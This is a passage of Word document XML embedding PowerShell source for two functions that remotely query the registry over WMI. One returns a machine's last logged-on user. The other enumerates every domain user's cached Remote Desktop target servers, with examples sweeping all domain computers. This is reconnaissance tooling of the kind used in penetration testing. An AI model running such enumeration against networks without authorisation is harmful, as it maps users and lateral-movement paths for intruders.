    <w:p w14:paraId="640211B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the last user logged onto all machines in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EB3E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8B2FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5AF73002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F99AFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBBA2B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425E3945" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C7F065" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185E34DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E40B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5D585" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64FD20C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDEC3B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46061187" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DB32AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0133C708" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A672997" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B35BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55D2B3A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # HKEY_LOCAL_MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F42F9A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $HKLM = 2147483650</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176FD89B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38D5657C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # try to open up the remote registry key to grab the last logged on user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA32235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26643521" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D56FFCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9FC931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F62A5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC39876" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBCB192" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF50B8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C8EE14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08621E2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C84EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Value = "LastLoggedOnUser"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F47D78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E4AB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="170564CA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastLoggedOn = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F85B18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB8D07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDE8D5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LastLoggedOn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470A226C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD76A6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A54E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning "[!] Error opening remote registry on $Computer. Remote registry likely not enabled."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E37E714" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A8B6D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B485F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="54943E6D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="562BBFB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-CachedRDPConnection {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676629A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55585CD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EE3291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0216C0B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Uses remote registry functionality to query all entries for the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEAFBE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        "Windows Remote Desktop Connection Client" on a machine, separated by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD9558" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        user and target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE74110" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31B7D276" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Note: This function requires administrative rights on the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411D5ED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        machine you're enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B48D5DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6441675C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2719CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43159E18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The hostname to query for RDP client information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5EE9A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Defaults to localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67361A22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21957739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B9C9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E847494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object for the remote connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A790C22" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70D3614B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78487E7E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1029988B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-CachedRDPConnection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDCE36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="406CAC8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the RDP connection client information for the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2424B39B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F0B09FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B1017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52F532BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8B4E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A311B39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the RDP connection client information for the WINDOWS2.testlab.local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EE259B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1325AB97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27347222" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="220B579F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local -Credential $Cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D3D5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A97E104" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the RDP connection client information for the WINDOWS2.testlab.local machine using alternate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA03430" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1FFEF832" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13845914" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="575A0F9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetComputer | Get-CachedRDPConnection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3515A81E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1ADF5593" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get cached RDP information for all machines in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E2B79B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AA6890" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0C7A1915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4320FA05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63245EEA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A33B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707DCA5D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C9536A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A91C646" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2570512F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60E7452C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2355A5AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C14E31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE162B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A945003" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CE348A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC28DD6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45C846C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # HKEY_USERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4EFED4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $HKU = 2147483651</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492E502" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="126836FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4311BF9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF06C49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1476F13B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32112D91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580DD1F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253BE238" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056245C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="261AB490" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract out the SIDs of domain users in this hive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DBBAC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D659AA2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DEA414C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        foreach ($UserSID in $UserSIDs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED7D19B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18910EB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE2912" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $UserName = Convert-SidToName $UserSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA5FEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="292EA60B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # pull out all the cached RDP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4CE82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36933B40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4954E0FD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                foreach ($Connection in $ConnectionKeys) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58482279" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # make sure this key is a cached connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F709E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if($Connection -match 'MRU.*') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270567D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB29AE8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED712E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $FoundConnection = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501BB359" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
